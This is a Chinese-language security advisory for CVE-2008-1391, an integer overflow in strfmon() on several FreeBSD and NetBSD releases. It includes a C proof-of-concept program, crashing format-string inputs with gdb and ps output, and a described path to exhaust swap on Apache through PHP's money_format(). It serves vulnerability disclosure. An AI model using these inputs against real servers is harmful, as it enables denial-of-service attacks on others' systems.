RootSSV:3103多个BSD平台'strfmon()'函数整数溢出漏洞
0.022 Low
EPSS
Percentile
88.3%
BUGTRAQ ID: 28479
CVE ID:CVE-2008-1391
CNCVE ID:CNCVE-20081391
多个BSD平台’strfmon()'函数处理存在整数溢出,可能以受影响应用程序上下文执行任意代码。失败的尝试可导致拒绝服务。
问题代码类似如下:
#include <monetary.h>
ssize_t
strfmon(char * restrict s, size_t maxsize, const char *
restrict format,
…);
- — 1. /usr/src/lib/libc/stdlib/strfmon.c -整数溢出
主要问题存在于strfmon()函数中,当以如下方法使用这个函数时: - —example-start–
#include <stdio.h>
#include <monetary.h>
int main(int argc, char* argv[]){
char buff[51];
char *bux=buff;
int res;
res=strfmon(bux, 50, argv[1], "0");
return 0;
} - —example-end–
并编译,可操作如下格式串:
cxib# ./pln %99999999999999999999n
Segmentation fault (core dumped)
问题如下:
cxib# gdb -q pln
(no debugging symbols found)…(gdb) r %99999999999999999999n
Starting program: /cxib/C/pln %99999999999999999999n
(no debugging symbols found)…(no debugging symbols found)…
Program received signal SIGSEGV, Segmentation fault.
0x2814e0e6 in memmove () from /lib/libc.so.7
(gdb)
memmove()会重分配内存。
cxib# gdb -q pln
(no debugging symbols found)…(gdb) r %.9999999999n
Starting program: /cxib/C/pln %.9999999999n
(no debugging symbols found)…(no debugging symbols found)…
Program received signal SIGSEGV, Segmentation fault.
0x2814f093 in abort () from /lib/libc.so.7
下个例子是:
cxib# ./pln %#99999999999999999999n
Long execution time. Let’s try check this process :
cxib# ps -aux | grep pln
cxib 1843 89.1 13.2 140320 119588 p2 R+ 4:29PM 0:09.68
./pln %#99999999999999999999n
cxib# ps -aux | grep pln
cxib 1843 94.7 48.4 482336 438236 p2 R+ 4:29PM 1:54.07
./pln %#99999999999999999999n
1 VSZ=140320
2 VSZ=482336
pln会分配更多的内存,PHP在money_format()函数中使用strfmon(),当我们在Apache中使用mod_php5,我们可以建立如下利用方法,结果如下:
- —apache-child-die—
swap_pager: out of swap space
swap_pager_getswapspace(16): failed
Mar 15 21:03:23 cxib kernel: pid 1210 (httpd), uid 80, was
killed: out of swap space - —apache-child-die—
NetBSD NetBSD 4.0
FreeBSD FreeBSD 6.0 .x
FreeBSD FreeBSD 6.0 -STABLE
FreeBSD FreeBSD 6.0 -RELEASE
FreeBSD FreeBSD 7.0 BETA4
FreeBSD FreeBSD 7.0 -RELENG
FreeBSD FreeBSD 7.0 -PRERELEASE
FreeBSD FreeBSD 7.0
FreeBSD FreeBSD 6.0 -RELEASE-p5
可联系供应商获得补丁信息:
<a href=“http://www.netbsd.org/” target=“_blank”>http://www.netbsd.org/</a>
Related
